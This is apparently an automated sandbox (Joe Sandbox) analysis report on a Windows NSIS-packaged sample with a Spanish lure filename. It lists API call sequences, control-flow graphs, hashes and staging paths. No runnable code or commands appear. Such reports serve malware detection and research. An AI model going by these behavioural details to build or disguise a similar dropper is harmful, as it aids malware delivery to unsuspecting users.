                                                • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                • String ID: "C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe"$.tmp$1033$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\sundhedsstyrelsens\ruttiest\rentable$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\sundhedsstyrelsens\ruttiest\rentable$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                • API String ID: 2488574733-2011355925
                                                • Opcode ID: 290ea68bc16bf9ba0967596cf016d677efff9e7d5fa8e06392f64e50e51ce68c
                                                • Instruction ID: 1c098c9ac5d33f9e9f606ea88917c77842503da0397251e5f420d8b791505771
                                                • Opcode Fuzzy Hash: 290ea68bc16bf9ba0967596cf016d677efff9e7d5fa8e06392f64e50e51ce68c
                                                • Instruction Fuzzy Hash: 92D107B1200301ABD7207F659D49A3B3AACEB80709F51443FF881B62D1DB7D8952CB6E

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 133 4054b0-4054cb 134 4054d1-405598 GetDlgItem * 3 call 40430b call 404c0e GetClientRect GetSystemMetrics SendMessageW * 2 133->134 135 40565a-405661 133->135 153 4055b6-4055b9 134->153 154 40559a-4055b4 SendMessageW * 2 134->154 136 405663-405685 GetDlgItem CreateThread CloseHandle 135->136 137 40568b-405698 135->137 136->137 140 4056b6-4056c0 137->140 141 40569a-4056a0 137->141 145 4056c2-4056c8 140->145 146 405716-40571a 140->146 143 4056a2-4056b1 ShowWindow * 2 call 40430b 141->143 144 4056db-4056e4 call 40433d 141->144 143->140 157 4056e9-4056ed 144->157 150 4056f0-405700 ShowWindow 145->150 151 4056ca-4056d6 call 4042af 145->151 146->144 148 40571c-405722 146->148 148->144 155 405724-405737 SendMessageW 148->155 158 405710-405711 call 4042af 150->158 159 405702-40570b call 405371 150->159 151->144 161 4055c9-4055e0 call 4042d6 153->161 162 4055bb-4055c7 SendMessageW 153->162 154->153 163 405839-40583b 155->163 164 40573d-405768 CreatePopupMenu call 406234 AppendMenuW 155->164 158->146 159->158 172 4055e2-4055f6 ShowWindow 161->172 173 405616-405637 GetDlgItem SendMessageW 161->173 162->161 163->157 170 40576a-40577a GetWindowRect 164->170 171 40577d-405792 TrackPopupMenu 164->171 170->171 171->163 174 405798-4057af 171->174 175 405605 172->175 176 4055f8-405603 ShowWindow 172->176 173->163 177 40563d-405655 SendMessageW * 2 173->177 178 4057b4-4057cf SendMessageW 174->178 179 40560b-405611 call 40430b 175->179 176->179 177->163 178->178 180 4057d1-4057f4 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 178->180 179->173 182 4057f6-40581d SendMessageW 180->182 182->182 183 40581f-405833 GlobalUnlock SetClipboardData CloseClipboard 182->183 183->163
                                                APIs
                                                • GetDlgItem.USER32(?,00000403), ref: 0040550E
                                                • GetDlgItem.USER32(?,000003EE), ref: 0040551D
                                                • GetClientRect.USER32(?,?), ref: 0040555A
                                                • GetSystemMetrics.USER32(00000002), ref: 00405561
                                                • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405582
                                                • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405593
                                                • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004055A6
                                                • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004055B4
                                                • SendMessageW.USER32(?,00001024,00000000,?), ref: 004055C7
                                                • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004055E9
                                                • ShowWindow.USER32(?,00000008), ref: 004055FD
                                                • GetDlgItem.USER32(?,000003EC), ref: 0040561E
                                                • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040562E
                                                • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405647
                                                • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405653
                                                • GetDlgItem.USER32(?,000003F8), ref: 0040552C
                                                  • Part of subcall function 0040430B: SendMessageW.USER32(00000028,?,?,00404137), ref: 00404319
                                                • GetDlgItem.USER32(?,000003EC), ref: 00405670
                                                • CreateThread.KERNELBASE(00000000,00000000,Function_00005444,00000000), ref: 0040567E
                                                • CloseHandle.KERNELBASE(00000000), ref: 00405685
                                                • ShowWindow.USER32(00000000), ref: 004056A9
                                                • ShowWindow.USER32(?,00000008), ref: 004056AE
                                                • ShowWindow.USER32(00000008), ref: 004056F8
                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040572C
                                                • CreatePopupMenu.USER32 ref: 0040573D
                                                • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405751
                                                • GetWindowRect.USER32(?,?), ref: 00405771
                                                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040578A
                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 004057C2
                                                • OpenClipboard.USER32(00000000), ref: 004057D2
                                                • EmptyClipboard.USER32 ref: 004057D8
                                                • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004057E4
                                                • GlobalLock.KERNEL32(00000000), ref: 004057EE
                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405802
                                                • GlobalUnlock.KERNEL32(00000000), ref: 00405822
                                                • SetClipboardData.USER32(0000000D,00000000), ref: 0040582D
                                                • CloseClipboard.USER32 ref: 00405833
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2972270846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2972239651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972312395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972705956.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                • String ID: (7B${
                                                • API String ID: 590372296-525222780
                                                • Opcode ID: 972fd15b03a93e7331ef4c8797c1849d59520224656438122eee1199d8052db9
                                                • Instruction ID: 42ee76c5c0789c909e5484b793d5ed8b68dab9236198efc003755603ec60545b
                                                • Opcode Fuzzy Hash: 972fd15b03a93e7331ef4c8797c1849d59520224656438122eee1199d8052db9
                                                • Instruction Fuzzy Hash: A4B16971900608FFDB119FA0DD89AAE7B79FB08354F00847AFA45B61A0CB754E51DF68

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 494 405a03-405a29 call 405cce 497 405a42-405a49 494->497 498 405a2b-405a3d DeleteFileW 494->498 500 405a4b-405a4d 497->500 501 405a5c-405a6c call 406212 497->501 499 405bbf-405bc3 498->499 502 405a53-405a56 500->502 503 405b6d-405b72 500->503 507 405a7b-405a7c call 405c12 501->507 508 405a6e-405a79 lstrcatW 501->508 502->501 502->503 503->499 506 405b74-405b77 503->506 509 405b81-405b89 call 406555 506->509 510 405b79-405b7f 506->510 511 405a81-405a85 507->511 508->511 509->499 517 405b8b-405b9f call 405bc6 call 4059bb 509->517 510->499 514 405a91-405a97 lstrcatW 511->514 515 405a87-405a8f 511->515 518 405a9c-405ab8 lstrlenW FindFirstFileW 514->518 515->514 515->518 534 405ba1-405ba4 517->534 535 405bb7-405bba call 405371 517->535 520 405b62-405b66 518->520 521 405abe-405ac6 518->521 520->503 525 405b68 520->525 522 405ae6-405afa call 406212 521->522 523 405ac8-405ad0 521->523 536 405b11-405b1c call 4059bb 522->536 537 405afc-405b04 522->537 526 405ad2-405ada 523->526 527 405b45-405b55 FindNextFileW 523->527 525->503 526->522 530 405adc-405ae4 526->530 527->521 533 405b5b-405b5c FindClose 527->533 530->522 530->527 533->520 534->510 538 405ba6-405bb5 call 405371 call 4060b3 534->538 535->499 547 405b3d-405b40 call 405371 536->547 548 405b1e-405b21 536->548 537->527 539 405b06-405b0f call 405a03 537->539 538->499 539->527 547->527 551 405b23-405b33 call 405371 call 4060b3 548->551 552 405b35-405b3b 548->552 551->527 552->527
                                                APIs
                                                • DeleteFileW.KERNELBASE(?,?,758E3420,758E2EE0,00000000), ref: 00405A2C
                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsm3276.tmp,\*.*,C:\Users\user\AppData\Local\Temp\nsm3276.tmp,?,?,758E3420,758E2EE0,00000000), ref: 00405A74
                                                • lstrcatW.KERNEL32(?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsm3276.tmp,?,?,758E3420,758E2EE0,00000000), ref: 00405A97
                                                • lstrlenW.KERNEL32(?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsm3276.tmp,?,?,758E3420,758E2EE0,00000000), ref: 00405A9D
                                                • FindFirstFileW.KERNELBASE(C:\Users\user\AppData\Local\Temp\nsm3276.tmp,?,?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsm3276.tmp,?,?,758E3420,758E2EE0,00000000), ref: 00405AAD
                                                • FindNextFileW.KERNELBASE(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405B4D
                                                • FindClose.KERNEL32(00000000), ref: 00405B5C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2972270846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2972239651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972312395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972705956.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                • String ID: "C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe"$C:\Users\user\AppData\Local\Temp\nsm3276.tmp$\*.*
                                                • API String ID: 2035342205-1186376234
                                                • Opcode ID: bf521971237f06a6bfd3a8137c3f0154ea7fee40ee360af2ff33bb12ffbce5a4
                                                • Instruction ID: 3abc1f52a39f62d65ddaa07d2a5323def7e4f5b1e1581b0ba6d8596f0725500f
                                                • Opcode Fuzzy Hash: bf521971237f06a6bfd3a8137c3f0154ea7fee40ee360af2ff33bb12ffbce5a4
                                                • Instruction Fuzzy Hash: FA41CE30901A18AADB31AB668C89ABF7678EF41714F10427BF801711D1D7BC69829E6E

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 693 405840-40588b CreateDirectoryW 694 405891-40589e GetLastError 693->694 695 40588d-40588f 693->695 696 4058b8-4058ba 694->696 697 4058a0-4058b4 SetFileSecurityW 694->697 695->696 697->695 698 4058b6 GetLastError 697->698 698->696
                                                APIs
                                                • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405883
                                                • GetLastError.KERNEL32 ref: 00405897
                                                • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004058AC
                                                • GetLastError.KERNEL32 ref: 004058B6
                                                Strings
                                                • C:\Users\user\Desktop, xrefs: 00405840
                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405866
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2972270846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2972239651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972312395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972705956.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
                                                • API String ID: 3449924974-26219170
                                                • Opcode ID: 6ae7c342d9c1b50a082fcf4789916780a4d0616efa07736c5e287c1420eecf92
                                                • Instruction ID: cbd092c4ebd5e7b47652c6b2ce971f8280a433404df7830fbb595f789125ae90
                                                • Opcode Fuzzy Hash: 6ae7c342d9c1b50a082fcf4789916780a4d0616efa07736c5e287c1420eecf92
                                                • Instruction Fuzzy Hash: 43011A72D00619DAEF10EFA0C9447EFBBB8EF04344F00803AD944B6280E7789614CF99
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2972270846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2972239651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972312395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972705956.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c82c24978351f7c13972ed02e311308c491194f519d2ef9506af47d33a0889c0
                                                • Instruction ID: a9eeadc94889c10b02ffd6b9c25b4bb5d01c95f6ce45251ce11bee8d9ce53b4a
                                                • Opcode Fuzzy Hash: c82c24978351f7c13972ed02e311308c491194f519d2ef9506af47d33a0889c0
                                                • Instruction Fuzzy Hash: BFF18671D04229CBCF28CFA8C8946ADBBB1FF45305F25816ED856BB281C7785A86CF45
                                                APIs
                                                • FindFirstFileW.KERNELBASE(758E3420,00426778,00425F30,00405D17,00425F30,00425F30,00000000,00425F30,00425F30,758E3420,?,758E2EE0,00405A23,?,758E3420,758E2EE0), ref: 00406560
                                                • FindClose.KERNELBASE(00000000), ref: 0040656C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2972270846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2972239651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972312395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972705956.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: Find$CloseFileFirst
                                                • String ID: xgB
                                                • API String ID: 2295610775-399326502
                                                • Opcode ID: 4403a27f78f835125bd15cd158b53f866fd18ebbb8f54cd400289453990cbd04
                                                • Instruction ID: a17ed3a5ae88bd5f55df5b749dd223de66f1ff534e9406d7b6838b5a0b6fdea6
                                                • Opcode Fuzzy Hash: 4403a27f78f835125bd15cd158b53f866fd18ebbb8f54cd400289453990cbd04
                                                • Instruction Fuzzy Hash: 6FD01231904530ABC3111778BE0CC5B7A689F553717628F36F466F12F4C7348C22869C

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 184 403dfe-403e10 185 403f51-403f60 184->185 186 403e16-403e1c 184->186 188 403f62-403faa GetDlgItem * 2 call 4042d6 SetClassLongW call 40140b 185->188 189 403faf-403fc4 185->189 186->185 187 403e22-403e2b 186->187 192 403e40-403e43 187->192 193 403e2d-403e3a SetWindowPos 187->193 188->189 190 404004-404009 call 404322 189->190 191 403fc6-403fc9 189->191 203 40400e-404029 190->203 195 403fcb-403fd6 call 401389 191->195 196 403ffc-403ffe 191->196 198 403e45-403e57 ShowWindow 192->198 199 403e5d-403e63 192->199 193->192 195->196 217 403fd8-403ff7 SendMessageW 195->217 196->190 202 4042a3 196->202 198->199 204 403e65-403e7a DestroyWindow 199->204 205 403e7f-403e82 199->205 214 4042a5-4042ac 202->214 212 404032-404038 203->212 213 40402b-40402d call 40140b 203->213 207 404280-404286 204->207 209 403e84-403e90 SetWindowLongW 205->209 210 403e95-403e9b 205->210 207->202 218 404288-40428e 207->218 209->214 215 403ea1-403eb2 GetDlgItem 210->215 216 403f3e-403f4c call 40433d 210->216 220 404261-40427a DestroyWindow EndDialog 212->220 221 40403e-404049 212->221 213->212 222 403ed1-403ed4 215->222 223 403eb4-403ecb SendMessageW IsWindowEnabled 215->223 216->214 217->214 218->202 225 404290-404299 ShowWindow 218->225 220->207 221->220 226 40404f-40409c call 406234 call 4042d6 * 3 GetDlgItem 221->226 228 403ed6-403ed7 222->228 229 403ed9-403edc 222->229 223->202 223->222 225->202 254 4040a6-4040e2 ShowWindow KiUserCallbackDispatcher call 4042f8 EnableWindow 226->254 255 40409e-4040a3 226->255 232 403f07-403f0c call 4042af 228->232 233 403eea-403eef 229->233 234 403ede-403ee4 229->234 232->216 237 403f25-403f38 SendMessageW 233->237 239 403ef1-403ef7 233->239 234->237 238 403ee6-403ee8 234->238 237->216 238->232 242 403ef9-403eff call 40140b 239->242 243 403f0e-403f17 call 40140b 239->243 252 403f05 242->252 243->216 251 403f19-403f23 243->251 251->252 252->232 258 4040e4-4040e5 254->258 259 4040e7 254->259 255->254 260 4040e9-404117 GetSystemMenu EnableMenuItem SendMessageW 258->260 259->260 261 404119-40412a SendMessageW 260->261 262 40412c 260->262 263 404132-404170 call 40430b call 406212 lstrlenW call 406234 SetWindowTextW call 401389 261->263 262->263 263->203 272 404176-404178 263->272 272->203 273 40417e-404182 272->273 274 4041a1-4041b5 DestroyWindow 273->274 275 404184-40418a 273->275 274->207 276 4041bb-4041e8 CreateDialogParamW 274->276 275->202 277 404190-404196 275->277 276->207 278 4041ee-404245 call 4042d6 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 276->278 277->203 279 40419c 277->279 278->202 284 404247-40425a ShowWindow call 404322 278->284 279->202 286 40425f 284->286 286->207
                                                APIs
                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403E3A
                                                • ShowWindow.USER32(?), ref: 00403E57
                                                • DestroyWindow.USER32 ref: 00403E6B
                                                • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403E87
                                                • GetDlgItem.USER32(?,?), ref: 00403EA8
                                                • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403EBC
                                                • IsWindowEnabled.USER32(00000000), ref: 00403EC3
                                                • GetDlgItem.USER32(?,?), ref: 00403F71
                                                • GetDlgItem.USER32(?,00000002), ref: 00403F7B
                                                • SetClassLongW.USER32(?,000000F2,?), ref: 00403F95
                                                • SendMessageW.USER32(0000040F,00000000,?,?), ref: 00403FE6
                                                • GetDlgItem.USER32(?,00000003), ref: 0040408C
                                                • ShowWindow.USER32(00000000,?), ref: 004040AD
                                                • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004040BF
                                                • EnableWindow.USER32(?,?), ref: 004040DA
                                                • GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 004040F0
                                                • EnableMenuItem.USER32(00000000), ref: 004040F7
                                                • SendMessageW.USER32(?,000000F4,00000000,?), ref: 0040410F
                                                • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404122
                                                • lstrlenW.KERNEL32(00423728,?,00423728,00429240), ref: 0040414B
                                                • SetWindowTextW.USER32(?,00423728), ref: 0040415F
                                                • ShowWindow.USER32(?,0000000A), ref: 00404293
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2972270846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2972239651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972312395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972705956.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                • String ID: (7B
                                                • API String ID: 3282139019-3251261122
                                                • Opcode ID: bf57cdb372042753c8b1df4c54f37feee0138c44ccfb620b50d6a1129c986343
                                                • Instruction ID: fc2721e09aaab4c72f4ebfdf2c157598dee1e076b88a1be66e463b94688f5fa6
                                                • Opcode Fuzzy Hash: bf57cdb372042753c8b1df4c54f37feee0138c44ccfb620b50d6a1129c986343
                                                • Instruction Fuzzy Hash: 6BC1C2B1600201FFCB21AF61ED85E2B3AB9EB95345F40057EFA41B11F0CB7998529B2D

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 287 403a5b-403a73 call 4065ec 290 403a75-403a85 call 406159 287->290 291 403a87-403abe call 4060df 287->291 298 403ae1-403b0a call 403d31 call 405cce 290->298 296 403ac0-403ad1 call 4060df 291->296 297 403ad6-403adc lstrcatW 291->297 296->297 297->298 305 403b10-403b15 298->305 306 403b9c-403ba4 call 405cce 298->306 305->306 307 403b1b-403b35 call 4060df 305->307 312 403bb2-403bd7 LoadImageW 306->312 313 403ba6-403bad call 406234 306->313 311 403b3a-403b43 307->311 311->306 314 403b45-403b49 311->314 316 403c58-403c60 call 40140b 312->316 317 403bd9-403c09 RegisterClassW 312->317 313->312 319 403b5b-403b67 lstrlenW 314->319 320 403b4b-403b58 call 405bf3 314->320 328 403c62-403c65 316->328 329 403c6a-403c75 call 403d31 316->329 321 403d27 317->321 322 403c0f-403c53 SystemParametersInfoW CreateWindowExW 317->322 326 403b69-403b77 lstrcmpiW 319->326 327 403b8f-403b97 call 405bc6 call 406212 319->327 320->319 325 403d29-403d30 321->325 322->316 326->327 332 403b79-403b83 GetFileAttributesW 326->332 327->306 328->325 340 403c7b-403c95 ShowWindow call 40657c 329->340 341 403cfe-403cff call 405444 329->341 333 403b85-403b87 332->333 334 403b89-403b8a call 405c12 332->334 333->327 333->334 334->327 348 403ca1-403cb3 GetClassInfoW 340->348 349 403c97-403c9c call 40657c 340->349 344 403d04-403d06 341->344 346 403d20-403d22 call 40140b 344->346 347 403d08-403d0e 344->347 346->321 347->328 350 403d14-403d1b call 40140b 347->350 353 403cb5-403cc5 GetClassInfoW RegisterClassW 348->353 354 403ccb-403cee DialogBoxParamW call 40140b 348->354 349->348 350->328 353->354 358 403cf3-403cfc call 4039ab 354->358 358->325
                                                APIs
                                                  • Part of subcall function 004065EC: GetModuleHandleA.KERNEL32(?,00000020,?,004034B3,00000009), ref: 004065FE
                                                  • Part of subcall function 004065EC: GetProcAddress.KERNEL32(00000000,?), ref: 00406619
                                                • lstrcatW.KERNEL32(1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,758E3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe",00000000), ref: 00403ADC
                                                • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\sundhedsstyrelsens\ruttiest\rentable,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,758E3420), ref: 00403B5C
